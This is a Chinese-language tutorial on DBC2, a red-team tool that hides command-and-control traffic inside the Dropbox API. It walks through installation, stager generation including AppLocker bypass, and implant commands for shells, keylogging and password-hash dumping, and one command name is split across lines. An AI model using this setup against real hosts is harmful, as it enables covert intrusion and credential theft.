许多公司使用DropBox作为共享工具和托管数据。因此,对DropBox服务器的流量被限制或归类为恶意域是不常见的。但是,有可能滥用DropBox的功能并将其用作命令和控制工具。
这可以通过DropBoxC2工具实现,该工具使用DropBox API在控制器和植入物之间进行通信,因为它完全在内存中运行并且流量被加密,所以它是隐秘的。
DropboxC2控制器的安装简单快捷。
git clone https://github.com/Arno0x/DBC2 dbc2
cd dbc2
pip install -r requirements.txt
chmod +x dropboxC2.py
从控制器到植入物的通信通过DropBox API执行。因此,需要创建新的应用程序才能生成API密钥。
需要在config.py文件(defaultAccessToken参数)中输入API密钥,否则用户需要在每次DBC2启动时插入密钥。
当DropBoxC2运行时,用户需要选择一个主密码,它将用于加密代理和控制器之间的所有数据。
在任何使用之前,需要在DropBox上发布Modules和Stage:
publishStage dbc
2
_agent.exe
将在DropBox上生成一个文件,该文件将进行XOR加密。
Dropbox C2可以生成从简单的.bat文件到可以绕过AppLocker的msbuild和sct的各种stager(植入物),以及从rubber ducky到macro的各种stager(植入物),从而在红队交战期间提供多个利用场景的能力。
使用以下命令可轻松生成暂存器:
genStager oneliner default
genStager batch default
从在目标主机上执行stager的那一刻起,将开始信标,并且将生成代理ID值并与信标相关联。
将在DropBox上生成两个文件,这两个文件将声明代理的状态以及将传递给目标的命令。这些文件的内容是加密的,以保持通信的机密性。
然后可以使用代理ID以便与目标交互并执行命令。
DropBoxC2还具有传输文件,通过交互式shell执行PowerShell命令以及从目标主机获取屏幕截图的功能。它还支持键盘记录功能,可以启动另一个进程。一些命令可以在下面找到
sendFile
getFile
shell
screenshot
此外,还可以使用各种PowerShell模块来执行其他任务,例如获取反向shell,转储密码哈希或从内存中检索明文密码。
另外还有另一个工具(DropBoxC2C),它利用DropBox作为命令和控制工具。然而,它更简单,并且它不提供DBC2的功能。
参考